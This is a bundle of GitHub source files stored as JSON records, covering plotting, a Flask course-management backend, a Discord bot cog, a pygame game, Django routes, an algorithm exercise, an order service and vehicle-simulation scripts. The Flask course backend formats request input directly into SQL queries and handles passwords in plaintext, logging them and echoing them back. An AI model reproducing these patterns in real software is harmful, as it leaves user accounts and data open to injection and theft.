plt.scatter(dataframe_x['By_coil'], dataframe_x['Bz_coil'], label='coil')\n plt.xlabel('By, G')\n plt.ylabel('Bz, G')\n plt.axis('equal')\n plt.legend()\n\n # rotate around y axis\n print('rotate around y axis')\n dataframe_y = dataframe[dataframe['axis'] == 'y']\n # print(dataframe_x)\n\n plt.figure('y-axis')\n # plt.scatter(dataframe_x['current_y'], dataframe_x['current_z'])\n plt.title('Rotate around y axis')\n plt.scatter(dataframe_y['Bx_measured'], dataframe_y['Bz_measured'], label='measured')\n plt.scatter(dataframe_y['Bx_coil'], dataframe_y['Bz_coil'], label='coil')\n plt.xlabel('Bx, G')\n plt.ylabel('Bz, G')\n plt.axis('equal')\n plt.legend()\n\n # rotate around z axis\n print('rotate around z axis')\n dataframe_x = dataframe[dataframe['axis'] == 'z']\n # print(dataframe_x)\n\n plt.figure('z-axis')\n # plt.scatter(dataframe_x['current_y'], dataframe_x['current_z'])\n plt.title('Rotate around z axis')\n plt.scatter(dataframe_x['Bx_measured'], dataframe_x['By_measured'], label='measured')\n plt.scatter(dataframe_x['Bx_coil'], dataframe_x['By_coil'], label='coil')\n plt.xlabel('Bx, G')\n plt.ylabel('By, G')\n plt.axis('equal')\n plt.legend()\n\n # plt.figure()\n # plt.plot(dataframe_x['B_measured'], label='measured')\n # plt.plot(dataframe_x['B_coil'], label='coil')\n # plt.legend()\n plt.show()\n\n","repo_name":"laimabusaite/magnetometer_raspi","sub_path":"plot_measured_magnetic_field_rotation.py","file_name":"plot_measured_magnetic_field_rotation.py","file_ext":"py","file_size_in_byte":5844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"3641617381","text":"from flask import Flask, request, jsonify\nfrom flask_cors import CORS, cross_origin\nimport sqlite3, json, time\nfrom datetime import datetime\n\napp = Flask(__name__)\ncors = CORS(app)\napp.config['CORS_HEADERS'] = 'Content-Type'\n\n\nconnect = sqlite3.connect('sqlite/canvas.db', check_same_thread=False)\ncursor = connect.cursor()\n\n@app.route('/test')\ndef my_profile():\n users = cursor.execute(\"SELECT * FROM users;\").fetchall()\n announcements = cursor.execute(\"SELECT * FROM announcements;\").fetchall()\n enrollments = cursor.execute(\"SELECT * FROM enrollments;\").fetchall()\n courses = cursor.execute(\"SELECT * FROM courses;\").fetchall()\n assignments = cursor.execute(\"SELECT * FROM assignments;\").fetchall()\n student_assignment = cursor.execute(\"SELECT * FROM student_assignment;\").fetchall()\n response_body = {\n \"users\": users,\n \"announcements\": announcements,\n \"enrollments\": enrollments,\n \"courses\": courses,\n \"assignments\": assignments,\n \"student_assignment\": student_assignment\n }\n return json.dumps(response_body)\n\n@app.route('/s_assignments')\ndef s_assignments():\n con = connect\n con.row_factory = dict_factory\n cur = con.cursor()\n assignments = cur.execute(\"SELECT assignments.assignment_id, description, due_date, answer FROM assignments left join student_assignment on student_assignment.assignment_id = assignments.assignment_id\").fetchall()\n return jsonify(assignments)\n\n@app.route('/t_assignments')\ndef t_assignments():\n con = connect\n con.row_factory = dict_factory\n cur = con.cursor()\n assignments = cur.execute(\"SELECT assignment_id, description, points, due_date from assignments\").fetchall()\n return jsonify(assignments)\n\n@app.route('/s_ann')\ndef s_ann():\n ann = cursor.execute(\"SELECT * from announcements\").fetchall()\n response_body = {\n \"data\":ann\n }\n return json.dumps(response_body)\n\n\ndef dict_factory(cursor, row):\n d = {}\n for idx, col in enumerate(cursor.description):\n d[col[0]] = row[idx]\n return d\n\n@app.route('/t_ann')\ndef t_ann():\n con = connect\n con.row_factory = dict_factory\n cur = con.cursor()\n ann = cur.execute(\"SELECT * from announcements\").fetchall()\n\n return jsonify(ann)\n\n\n@app.route('/s_grade')\ndef s_grade():\n ann = cursor.execute(\"SELECT assignments.assignment_id, description, points, grade from student_assignment natural join assignments\").fetchall()\n response_body = {\n \"data\":ann\n }\n return json.dumps(response_body)\n\n@app.route('/t_grade')\ndef t_grade():\n con = connect\n con.row_factory = dict_factory\n cur = con.cursor()\n ann = cur.execute(\"SELECT s_assignment_id, answer, user_id, assignments.assignment_id, description, points, grade from student_assignment natural join assignments\").fetchall()\n \n return jsonify(ann)\n\n\n@app.route('/users')\ndef get_users():\n users = cursor.execute(\"SELECT * FROM users;\").fetchall()\n\n@app.route('/users_courses')\ndef get_users_courses():\n users = cursor.execute(\"SELECT * FROM users WHERE role != 'admin';\").fetchall()\n courses = cursor.execute(\"SELECT * FROM courses;\").fetchall()\n response_body = {\n \"users\": users,\n \"courses\": courses\n }\n return json.dumps(response_body)\n\n@app.route('/users/')\ndef get_user(user_id):\n user = cursor.execute(\"SELECT * FROM users WHERE user_id = {0};\".format(user_id)).fetchall()[0]\n response_body = {\n \"user\": user\n }\n return json.dumps(response_body)\n\n@app.route('/edit_profile/', methods=['POST'])\ndef edit_profile(user_id):\n req = json.loads(request.data)\n newName = req['new_name']\n newEmail = req['new_email']\n newS1 = req['new_s1']\n newS2 = req['new_s2']\n newS3 = req['new_s3']\n msg = \"\"\n\n if newName != None and newName != \"\":\n cursor.execute(\"UPDATE users SET full_name = '{0}' WHERE user_id = {1};\".format(newName, user_id))\n connect.commit()\n msg = \"Your name is now \" + newName + \"\\n\"\n if newEmail != None and newEmail != \"\":\n cursor.execute(\"UPDATE users SET email = '{0}' WHERE user_id = {1};\".format(newEmail, user_id))\n connect.commit()\n msg += \"Your email is now \" + newEmail + \"\\n\"\n if newS1 != None and newS1 != \"\":\n cursor.execute(\"UPDATE users SET security_question_1 = '{0}' WHERE user_id = {1};\".format(newS1, user_id))\n connect.commit()\n msg += \"Your answer for the question \\\"What is your favorite movie?\\\" is now \\\"\" + newS1 + \"\\\"\\n\"\n if newS2 != None and newS2 != \"\":\n cursor.execute(\"UPDATE users SET security_question_2 = '{0}' WHERE user_id = {1};\".format(newS2, user_id))\n connect.commit()\n msg += \"Your answer for the question \\\"What is your father's middle name?\\\" is now \\\"\" + newS2 + \"\\\"\\n\"\n if newS3 != None and newS3 != \"\":\n cursor.execute(\"UPDATE users SET security_question_3 = '{0}' WHERE user_id = {1};\".format(newS3, user_id))\n connect.commit()\n msg += \"Your answer for the question \\\"What is the make of your first car?\\\" is now \\\"\" + newS3 + \"\\\"\\n\"\n\n if not ((newName != None and newName != \"\") or (newEmail != None and newEmail != \"\") or (newS1 != None and newS1 != \"\") or (newS2 != None and newS2 != \"\") or (newS3 != None and newS3 != \"\")):\n msg = \"Please enter at least an input\"\n\n response_body = {\n \"message\": msg\n }\n return json.dumps(response_body)\n\n@app.route('/edit_user_info_admin/', methods=['POST'])\ndef edit_user_info_admin(user_email):\n req = json.loads(request.data)\n newName = req['new_name']\n newEmail = req['new_email']\n newS1 = req['new_s1']\n newS2 = req['new_s2']\n newS3 = req['new_s3']\n msg = \"\"\n\n if newName != None and newName != \"\":\n cursor.execute(\"UPDATE users SET full_name = '{0}' WHERE email = '{1}';\".format(newName, user_email))\n connect.commit()\n msg = \"Your name is now \" + newName + \"\\n\"\n if newEmail != None and newEmail != \"\":\n cursor.execute(\"UPDATE users SET email = '{0}' WHERE email = '{1}';\".format(newEmail, user_email))\n connect.commit()\n msg += \"Your email is now \" + newEmail + \"\\n\"\n if newS1 != None and newS1 != \"\":\n cursor.execute(\"UPDATE users SET security_question_1 = '{0}' WHERE email = '{1}';\".format(newS1, user_email))\n connect.commit()\n msg += \"Your answer for the question \\\"What is your favorite movie?\\\" is now \\\"\" + newS1 + \"\\\"\\n\"\n if newS2 != None and newS2 != \"\":\n cursor.execute(\"UPDATE users SET security_question_2 = '{0}' WHERE email = '{1}';\".format(newS2, user_email))\n connect.commit()\n msg += \"Your answer for the question \\\"What is your father's middle name?\\\" is now \\\"\" + newS2 + \"\\\"\\n\"\n if newS3 != None and newS3 != \"\":\n cursor.execute(\"UPDATE users SET security_question_3 = '{0}' WHERE email = '{1}';\".format(newS3, user_email))\n connect.commit()\n msg += \"Your answer for the question \\\"What is the make of your first car?\\\" is now \\\"\" + newS3 + \"\\\"\\n\"\n\n if not ((newName != None and newName != \"\") or (newEmail != None and newEmail != \"\") or (newS1 != None and newS1 != \"\") or (newS2 != None and newS2 != \"\") or (newS3 != None and newS3 != \"\")):\n msg = \"Please enter at least an input\"\n\n response_body = {\n \"message\": msg\n }\n return json.dumps(response_body)\n\n@app.route('/add_course', methods=['POST'])\ndef add_course():\n req = json.loads(request.data)\n newName = req['new_course_name']\n newCapacity = req['new_capacity']\n newDescription = req['new_description']\n msg = \"\"\n\n courses = cursor.execute(\"SELECT * FROM courses;\").fetchall()\n new_idx = len(courses) + 1\n\n cursor.execute(\"INSERT INTO courses VALUES ({0}, '{1}', NULL, {2}, '{3}');\".format(new_idx, newName, newCapacity, newDescription))\n connect.commit()\n msg = \"Successfully added \" + newName + \" to the system\"\n\n response_body = {\n \"message\": msg\n }\n return json.dumps(response_body)\n\n@app.route('/settings', methods=['POST'])\ndef change_status():\n req = json.loads(request.data)\n newStatus = req['newStatus']\n email = req['email']\n cursor.execute(\"UPDATE users SET status = '{0}' WHERE email = '{1}';\".format(newStatus, email))\n connect.commit()\n return {}\n\n@app.route('/new_submission', methods=['GET','POST'])\ndef new_submission():\n req = json.loads(request.data)\n assignment_id = req['assignment_id']\n description = req['description']\n due_date = req['due_date']\n user_id = req['user_id']\n answer = req['answer']\n cursor.execute(f\"UPDATE student_assignment SET answer = '{answer}' where assignment_id = {assignment_id} and user_id = {user_id};\")\n connect.commit()\n return {}\n\n\n@app.route('/new_grade', methods=['GET','POST'])\ndef new_grade():\n req = json.loads(request.data)\n # assignment_id = req['assignment_id']\n s_assignment_id = req['s_assignment_id']\n # student_id = req['user_id']\n grade = req['grade']\n cursor.execute(f\"UPDATE student_assignment SET grade = '{grade}' where s_assignment_id = {s_assignment_id};\")\n connect.commit()\n return {}\n\n@app.route('/new_ann', methods=['POST'])\ndef new_ann():\n req = json.loads(request.data)\n now = datetime.now() # current date and time\n date_time = now.strftime(\"%m/%d/%Y\")\n content = req['content']\n cursor.execute(f\"INSERT INTO announcements (course_id, posted_date, content) Values (1, '{date_time}', '{content}');\")\n connect.commit()\n return {}\n\n@app.route('/new_ass', methods=['POST'])\ndef new_ass():\n req = json.loads(request.data)\n description = req['description']\n due = req['due']\n points = req['points']\n cursor.execute(f\"INSERT INTO assignments (course_id, due_date, points, description) Values (1, '{due}', {points}, '{description}');\")\n connect.commit()\n return {}\n\n@app.route('/')\ndef dashboard(user_id):\n if user_id == \"favicon.ico\":\n return {}\n\n activeStudents = cursor.execute(\"SELECT * FROM users WHERE status = 'active' AND role = 'student';\").fetchall()\n activeTeachers = cursor.execute(\"SELECT * FROM users WHERE status = 'active' AND role = 'teacher';\").fetchall()\n courses = cursor.execute(\"SELECT * FROM courses;\").fetchall()\n\n currTimeSeconds = int(time.time())\n\n teacher_assignments = cursor.execute(\"SELECT * FROM assignments JOIN courses USING(course_id) \\\n WHERE instructor_id = \" + user_id + \";\").fetchall()\n to_be_graded = []\n for a in teacher_assignments:\n dueDate = a[2].split(\"/\")\n dueDateSeconds = datetime(int(dueDate[2]), int(dueDate[0]), int(dueDate[1]), 23, 59).timestamp()\n if (currTimeSeconds - dueDateSeconds >= 0):\n to_be_graded.append(a)\n\n student_assignments = cursor.execute(\"SELECT * FROM assignments \\\n JOIN student_assignment USING(assignment_id) \\\n JOIN courses USING(course_id) \\\n WHERE user_id = \" + user_id + \";\").fetchall()\n todo = []\n upcoming = []\n past = []\n for a in student_assignments:\n dueDate = a[2].split(\"/\")\n dueDateSeconds = datetime(int(dueDate[2]), int(dueDate[0]), int(dueDate[1]), 23, 59).timestamp()\n if (currTimeSeconds - dueDateSeconds >= 0):\n past.append(a)\n elif (dueDateSeconds - currTimeSeconds > 60*60*24*3):\n upcoming.append(a)\n else:\n todo.append(a)\n\n response_body = {\n \"numOfActiveStudents\": len(activeStudents),\n \"numOfActiveTeachers\": len(activeTeachers),\n \"numOfCourses\": len(courses),\n \"to_be_graded\": to_be_graded,\n \"todo\": todo,\n \"upcoming\": upcoming,\n \"past\": past\n }\n return json.dumps(response_body)\n\n\n@app.route('/login', methods=['GET','POST'])\ndef validate_login():\n req = json.loads(request.data)\n username = req['username']\n password = req['pwd']\n\n user = cursor.execute(\"SELECT * FROM users WHERE username = '{0}';\".format(username)).fetchall()[0]\n if user[5] == 'inactive':\n response_body = {\n \"inactive\": True\n }\n return json.dumps(response_body)\n\n sql = \"SELECT password from users WHERE username = '\"+username+\"';\"\n print(sql)\n if cursor.execute(sql).fetchone(): # if the user exists in the database\n matching_password = cursor.execute(sql).fetchone()[0]\n else: # make matching password 0 so that login always fails\n matching_password = 0\n print(matching_password)\n\n user = cursor.execute(\"SELECT user_id, role FROM users WHERE username = '{0}';\".format(username)).fetchall()[0]\n user_id = user[0]\n role = user[1]\n\n response_body = {\n \"success\": password == matching_password,\n \"user_id\": user_id,\n \"role\": role,\n \"inactive\": False\n }\n return json.dumps(response_body)\n\n@app.route('/signup', methods=['GET','POST'])\n@cross_origin()\ndef sign_up():\n req = json.loads(request.data)\n username, name, pwd, email, confirmPwd, sa1, sa2, sa3, role = req['username'], req['name'], req['pwd'], req['email'], req['confirmPwd'], req['sa1'], req['sa2'], req['sa3'], req['role']\n\n # assign the next number of student id\n user_id = cursor.execute('SELECT MAX(user_id) from users;').fetchone()[0] + 1\n print(user_id)\n\n # add the user to database\n cursor.execute(\"INSERT INTO users (user_id, username, password, full_name, email, status, role, security_question_1, security_question_2, security_question_3) VALUES (\"+str(user_id)+\", '\"+username+\"', '\"+pwd+\"', '\"+name+\"', '\"+email+\"', 'inactive', '\"+role+\"', '\"+sa1+\"', '\"+sa2+\"', '\"+sa3+\"');\")\n connect.commit()\n\n response_body = {\n 'success': True\n }\n return json.dumps(response_body)\n \n@app.route('/login/AnswerSq', methods=['GET','POST'])\ndef validate_sq():\n req = json.loads(request.data)\n username, sa1, sa2, sa3, pwd = req['username'], req['sa1'], req['sa2'], req['sa3'], req['pwd']\n\n # first check if user exists\n user_exists = False\n\n if cursor.execute(\"SELECT * from users where username = '\"+username+\"';\").fetchone():\n print('user exists')\n user_exists = True\n # validate security answers\n answer_match = False\n # print(cursor.execute(\"SELECT * from users where username = '\"+username+\"';\").fetchone())\n if (sa1, sa2, sa3) == cursor.execute(\"SELECT security_question_1, security_question_2, security_question_3 from users where username = '\"+username+\"';\").fetchone():\n print('validated')\n answer_match = True\n # reset password when user exists and security answers validated\n cursor.execute(\"UPDATE users SET password = '\"+pwd+\"' WHERE username = '\"+username+\"';\")\n connect.commit()\n\n\n response_body = {\n 'user_exists': user_exists,\n 'answer_match': answer_match,\n 'new_password': cursor.execute(\"SELECT password from users where username = '\"+username+\"';\").fetchone()[0]\n }\n\n return json.dumps(response_body)\n\n@app.route('/enrollment', methods=['POST'])\ndef enroll():\n req = json.loads(request.data)\n user_id = req['user_id']\n course_to_add = req['course_to_add']\n\n user = cursor.execute(\"SELECT * FROM users WHERE user_id = {0};\".format(user_id)).fetchall()[0]\n role = user[6]\n course = cursor.execute(\"SELECT * FROM courses WHERE course_id = {0};\".format(course_to_add)).fetchall()[0]\n if role == \"teacher\":\n if course[2] != None:\n msg = course[1] + \" already has an instructor\"\n else:\n cursor.execute(\"UPDATE courses SET instructor_id = {0} WHERE course_id = {1};\".format(user_id, course_to_add))\n connect.commit()\n msg = user[3] + \" is now the instructor of \" + course[1]\n else:\n enrollment = cursor.execute(\"SELECT * FROM enrollments WHERE user_id = {0} AND course_id = {1};\".format(user_id, course_to_add)).fetchall()\n if len(enrollment) > 0:\n msg = user[3] + \" is already enrolled in \" + course[1]\n else:\n numOfEnrollments = len(cursor.execute(\"SELECT * FROM enrollments;\").fetchall())\n numOfStudentAssignment = len(cursor.execute(\"SELECT * FROM student_assignment;\").fetchall())\n cursor.execute(\"INSERT INTO enrollments VALUES ({0}, {1}, {2});\".format(numOfEnrollments+1, user_id, course_to_add))\n connect.commit()\n assignments = cursor.execute(\"SELECT * FROM assignments WHERE course_id = {0};\".format(course_to_add)).fetchall()\n for a in assignments:\n numOfStudentAssignment += 1\n cursor.execute(\"INSERT INTO student_assignment VALUES ({0}, {1}, {2}, NULL, NULL);\".format(numOfStudentAssignment, user_id, a[0]))\n connect.commit()\n msg = user[3] + \" is now enrolled in \" + course[1]\n\n response_body = {\n \"message\": msg\n }\n return json.dumps(response_body)\n\n","repo_name":"chrisxx97/Canvas-Project","sub_path":"canvas/backend/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":17090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"26807894865","text":"import logging\nfrom datetime import timedelta\n\nfrom discord import Embed, Message, TextChannel\nfrom discord.ext import commands\nfrom discord.ext.commands import Bot\n\nfrom ..cog import Cog\nfrom ..config import config\n\n\nlogger = logging.getLogger(__name__)\n\n\nasync def setup(bot: Bot) -> None:\n await bot.add_cog(MessageLogging(bot))\n\n\nasync def teardown(bot: Bot) -> None:\n await bot.remove_cog(\"MessageLogging\")\n\n\nclass MessageLogging(Cog):\n def __init__(self, bot: Bot) -> None:\n super().__init__(bot, logger)\n\n async def run_once_when_ready(self) -> None:\n self.channel: TextChannel = await self.bot.fetch_channel(config.channels.text.conversation)\n return await super().run_once_when_ready()\n\n @commands.Cog.listener(\"on_message\")\n async def on_message(self, message: Message) -> None:\n if message.author.bot or message.channel.id == config.channels.text.conversation:\n return\n\n date = (message.created_at + timedelta(hours=9)).strftime(\"%s\")\n description = f\"Date: \\n\"\n description += f\"Name: `{message.author}`\\n\"\n description += f\"Channel: {message.channel.mention} (`{message.channel.id}`)\\n\"\n description += f\"URL: {message.jump_url}\\n\"\n description += f\"Content: `{message.content}`\\n\"\n\n embed = Embed(color=message.author.color, description=description)\n name = f\"{message.author.display_name}({message.author.id})\"\n embed.set_author(name=name, icon_url=message.author.avatar.url)\n await self.channel.send(embed=embed)\n\n return\n","repo_name":"ster-phys/bot_cps","sub_path":"apps/mailot/conversation.py","file_name":"conversation.py","file_ext":"py","file_size_in_byte":1586,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"42767261365","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Aug 16 14:20:41 2019\r\n\r\n@author: Charles\r\n\"\"\"\r\n\r\nimport pygame\r\nfrom pygame.sprite import Sprite\r\n\r\n\r\nclass Bullet(Sprite):\r\n '''class to manage bullets fires from the ship'''\r\n \r\n def __init__(self, ai_settings, screen, rocket):\r\n '''create a bullet object at the ships current location'''\r\n super().__init__()\r\n self.screen = screen\r\n \r\n #creat a bullet rectAT (0, 0) and the set the correct position\r\n self.rect = pygame.Rect(0, 0, int(ai_settings.bullet_width),\r\n int(ai_settings.bullet_height))\r\n self.rect.centerx = rocket.rect.centerx\r\n self.rect.top = rocket.rect.top\r\n \r\n #store the bullet's position as a decimmal value\r\n \r\n self.y = float(self.rect.y)\r\n \r\n self.color = ai_settings.bullet_color\r\n self.speed_factor = ai_settings.bullet_speed_factor\r\n\r\n def update(self):\r\n '''move the bullet up the screen'''\r\n #update the decimal positon of the bullet\r\n self.y -= self.speed_factor\r\n #update the rect position\r\n self.rect.y = self.y\r\n \r\n def draw_bullet(self):\r\n '''draw bullet to the screen'''\r\n pygame.draw.rect(self.screen, self.color, self.rect)","repo_name":"CharlesGaskins/games","sub_path":"alien_invasion/bullet.py","file_name":"bullet.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"31452868417","text":"from django.urls import path\nfrom . import views as v\n\napp_name = 'glosowania'\n\nurlpatterns = (\n path('status//', v.status, name='status'),\n # http://127.0.0.1:8000/glosowania/details/89/\n path('details//', v.details, name='details'),\n path('edit//', v.edit, name='edit'),\n path('nowy/', v.dodaj, name='dodaj_nowy'),\n)\n","repo_name":"soma115/wikikracja","sub_path":"glosowania/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"2"} +{"seq_id":"16708849207","text":"import sys\nimport random\n\n\n# @include\nclass Interval:\n\n def __init__(self, left=0, right=0):\n self.left = left\n self.right = right\n# @exclude\n\n def __eq__(self, other):\n return self.left == other.left and self.right == other.right\n\n def __repr__(self):\n return '(%s, %s)' % (self.left, self.right)\n\n def __hash__(self):\n return self.left ^ self.right\n\n\n# @include\n\n\nclass EndPoint:\n\n def __init__(self, interval, is_left):\n self.ptr = interval\n self.is_left = is_left\n\n def __lt__(self, other):\n a = self.ptr.left if self.is_left else self.ptr.right\n b = other.ptr.left if other.is_left else other.ptr.right\n return a < b or (a == b and self.is_left and not other.is_left)\n# @exclude\n\n def __repr__(self):\n return '%s: (%s, %s)' % (\n ('Right', 'Left')[self.is_left], self.ptr.left, self.ptr.right)\n\n\n# @include\ndef find_minimum_visits(intervals):\n endpoints = []\n for i in intervals:\n endpoints.append(EndPoint(i, True))\n endpoints.append(EndPoint(i, False))\n endpoints.sort()\n\n def find_minimum_visits_helper(endpoints):\n S = [] # A minimum set of visit times.\n covered = set()\n covering = []\n for e in endpoints:\n if e.is_left:\n covering.append(e.ptr)\n elif e.ptr not in covered:\n # e's interval has not been covered.\n S.append(e.ptr.right)\n # Adds all intervals in covering to covered.\n covered.update(covering)\n covering.clear() # e is contained in all intervals in covering.\n return S\n return find_minimum_visits_helper(endpoints)\n# @exclude\n\n\n# O(n^2) checking solution\ndef check_ans(intervals, ans):\n is_visited = [False] * len(intervals)\n for a in ans:\n for i, interval in enumerate(intervals):\n if interval.left <= a <= interval.right:\n is_visited[i] = True\n assert all(is_visited)\n\n\ndef simple_test():\n intervals = [\n Interval(1, 4), Interval(2, 8), Interval(3, 6), Interval(3, 5),\n Interval(7, 10), Interval(9, 11)\n ]\n ans = find_minimum_visits(intervals)\n assert ans == [4, 10]\n intervals = [\n Interval(1, 2), Interval(2, 3), Interval(3, 4), Interval(4, 5),\n Interval(5, 6), Interval(6, 7)\n ]\n ans = find_minimum_visits(intervals)\n assert ans == [2, 4, 6]\n\n\ndef main():\n simple_test()\n for times in range(1000):\n print('Test', times)\n n = int(sys.argv[1]) if len(sys.argv) == 2 else random.randint(1, 10000)\n A = []\n for i in range(n):\n left = random.randrange(10000)\n right = random.randint(left, left + 100)\n A.append(Interval(left, right))\n ans = find_minimum_visits(A)\n check_ans(A, ans)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"epibook/epibook.github.io","sub_path":"solutions/python/points_covering_intervals_alternative.py","file_name":"points_covering_intervals_alternative.py","file_ext":"py","file_size_in_byte":2906,"program_lang":"python","lang":"en","doc_type":"code","stars":338,"dataset":"github-code","pt":"2"} +{"seq_id":"34944701014","text":"from flask import Flask, jsonify, request\nimport requests\n\nfrom order_service.model import *\n\n\nauth_broker_url = 'http://127.0.0.1:9999/auth'\norder_app = Flask(__name__)\n\n\n@order_app.before_request\ndef _db_connect():\n if db.is_closed():\n db.connect()\n\n\n@order_app.teardown_request\ndef _db_close(exc):\n if not db.is_closed():\n db.close()\n\n\n@order_app.route('/', methods=['GET'])\ndef get_order():\n response = requests.get(auth_broker_url, headers=request.headers).json()\n if response.get('error'):\n return jsonify({\n 'error': 'Invalid Auth'\n })\n\n orders = Order.select().where(Order.cust_id == response.get('id'))\n\n data = [order.serialize() for order in orders]\n\n return jsonify(data)\n\n\n@order_app.route('/', methods=['GET'])\ndef get_order_by_unique_id(unique_id):\n order = Order.get_or_none(Order.unique_id == unique_id)\n\n if order is None:\n return jsonify({\n 'error' : 'Order not found'\n })\n return jsonify(order.serialize())\n\n\n@order_app.route('/', methods=['POST'])\ndef create_order():\n if len(request.json.get('items')) == 0:\n return jsonify({\n 'error': 'You must specify at least 1 item'\n })\n\n response = requests.get(auth_broker_url, headers=request.headers).json()\n if response.get('error'):\n return jsonify({\n 'error': 'Invalid Auth'\n })\n\n order = Order(\n cust_id=response.get('id'),\n emp_id=request.json.get('emp_id'),\n from_lat=request.json.get('from_lat'),\n from_lng=request.json.get('from_lng'),\n additional_detail=request.json.get('additional_detail')\n )\n\n try:\n order.save()\n except Exception as e:\n print(e)\n return jsonify({\n 'error': 'Missing one or more field'\n })\n\n for item in request.json.get('items'):\n order_point = OrderPoint(\n order=order,\n receiver_name=item['receiver_name'],\n to_lat=item['to_lat'],\n to_lng=item['to_lng'],\n weight=item['weight']\n )\n\n order_point.save()\n\n data = {**order.serialize()}\n\n return jsonify(data)","repo_name":"ilhamfp/multisend","sub_path":"order_service/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"22681351384","text":"import unittest\nimport collections\nfrom unittest.case import TestCase\n\nclass CollectionSimpleTest(unittest.TestCase):\n\n def test_counter(self):\n s = \"One two three, one two TREE.\"\n sx = s.translate(str.maketrans(\"\", \"\", \",.\")).lower().split()\n a = collections.Counter(sx)\n print(a.most_common())\n\n\n def test_deaultdict(self):\n di = collections.defaultdict(int)\n print(di)\n self.assertEquals(di[\"9\"], 0)\n\n dd = collections.defaultdict(list)\n print(dd[1])\n self.assertListEqual(dd[1], [])","repo_name":"lostsquirrel/python_test","sub_path":"library-demos/collections_test/simple_test.py","file_name":"simple_test.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"40932183539","text":"\nimport math\nimport vs\n\n#import ctypes\n\n# This is a routine which takes input from a running vehicle and\n# creates a new path to avoid the detected obstruction.\n#vs_outvals = []\ndef steer (signal, intab):\n\n # No Inputs\n num = len(intab)\n if (num != 0):\n return -1.0\n\n\n ROAD_ID = vs.var(\"ROAD_PATH_ID\").value()\n LForward = vs.var(\"L_FORWARD\").value()\n XCG_TM = vs.getval(\"XCG_TM\")\n YCG_TM = vs.var(\"YCG_TM\").value()\n\n Yaw = vs.var(\"YAW\").value()\n\n Xpreview = XCG_TM + LForward*math.cos(Yaw)\n Ypreview = YCG_TM + LForward*math.sin(Yaw)\n\n RoadL = vs.road_l_id(Xpreview, Ypreview, ROAD_ID, 1)\n\n LatTrack = vs.getval(\"LAT_TRACK\")\n GainStr = vs.getval(\"GAIN_STEER_CTRL\")\n\n if (signal == \"OPEN\"):\n steer = (LatTrack - RoadL)*GainStr\n\n\n vs.outvals = []\n\n vs.outvals.append(steer)\n vs.outvals.append(Xpreview)\n vs.outvals.append(Ypreview)\n return 0.0\n\ndef steer_param (signal, intab):\n\n # No Inputs\n num = len(intab)\n if (num != 0):\n return -1.0\n\n\n ROAD_ID = vs.var(\"ROAD_PATH_ID\").value()\n LForwardVar = vs.var(\"L_FORWARD\")\n\n LForward = LForwardVar.value()\n\n #Example on how to examine validity of value\n if (LForwardVar.ident() == -1):\n vs.print(LForwardVar.name())\n vs.print(\"Value not found\")\n return -1.0\n\n XCG_TM = vs.getval(\"XCG_TM\")\n YCG_TM = vs.var(\"YCG_TM\").value()\n\n Yaw = vs.var(\"YAW\").value()\n\n Xpreview = XCG_TM + LForward*math.cos(Yaw)\n Ypreview = YCG_TM + LForward*math.sin(Yaw)\n\n RoadL = vs.road_l_id(Xpreview, Ypreview, ROAD_ID, 1)\n RoadPres = vs.road_l_id(XCG_TM, YCG_TM, ROAD_ID, 1)\n\n LatTrack = vs.getval(\"LAT_TRACK\")\n GainStr = vs.getval(\"GAIN_STEER_CTRL\")\n\n if (signal == \"OPEN\"):\n steer = (LatTrack - RoadL)*GainStr\n\n LatError = (LatTrack - RoadPres)\n\n vs.var(\"LERROR\").setvalue(LatError)\n\n LatError = abs(LatError)\n\n toterr = vs.getval(\"TOTERR\")\n\n vs.var(\"TOTERR\").setvalue(toterr+LatError)\n\n\n\n vs.outvals = []\n\n vs.outvals.append(steer)\n vs.outvals.append(Xpreview)\n vs.outvals.append(Ypreview)\n return 0.0\n\ndef update_tab (signal, intab):\n\n # No Inputs\n num = len(intab)\n if (num != 0):\n return -1.0\n\n Iters = vs.var(\"ITERS\").value()\n Iters = int(Iters)\n Toterr = vs.var(\"TOTERR\").value()\n\n vs.tab(\"LFWD_ES\").entry(0, Iters, 1).setvalue(Toterr)\n\n vs.outvals = []\n\n return 0.0\n\n\ndef bestval_lfwd (signal, intab):\n\n # No Inputs\n num = len(intab)\n if (num != 0):\n return -1.0\n\n Niters = vs.var(\"NITERS\").value()\n Printvals = vs.var(\"PRINTVALS\").value()\n\n bestval = vs.tab(\"LFWD_OPTS\").entry(0, 1, 1).value()\n besterr = vs.tab(\"LFWD_ES\").entry(0, 1, 1).value()\n\n Niters = int(Niters)\n\n if (Printvals == 1):\n vs.print(\"L_FORWARD parameter examined.\")\n for ival in range(1,Niters+1):\n newerr = vs.tab(\"LFWD_ES\").entry(0, ival, 1).value()\n entrystr = \"Index: \"+str(ival)+\" Entry: \"+str(vs.tab(\"LFWD_OPTS\").entry(0, ival, 1).value())+\" Value: \"+str(round(vs.tab(\"LFWD_ES\").entry(0, ival, 1).value(),4))\n if (Printvals == 1):\n vs.print(entrystr)\n if (newerr < besterr):\n besterr = newerr\n bestval = vs.tab(\"LFWD_OPTS\").entry(0, ival, 1).value()\n\n if (Printvals == 1):\n vs.print(\"Best parameter value is:\")\n vs.print(str(bestval))\n vs.print(\"Error Sum for this value is:\")\n vs.print(str(round(besterr,4)))\n\n vs.var(\"BESTVAL\").setvalue(bestval)\n vs.var(\"BESTVALERROR\").setvalue(besterr)\n\n\n vs.outvals = []\n\n return 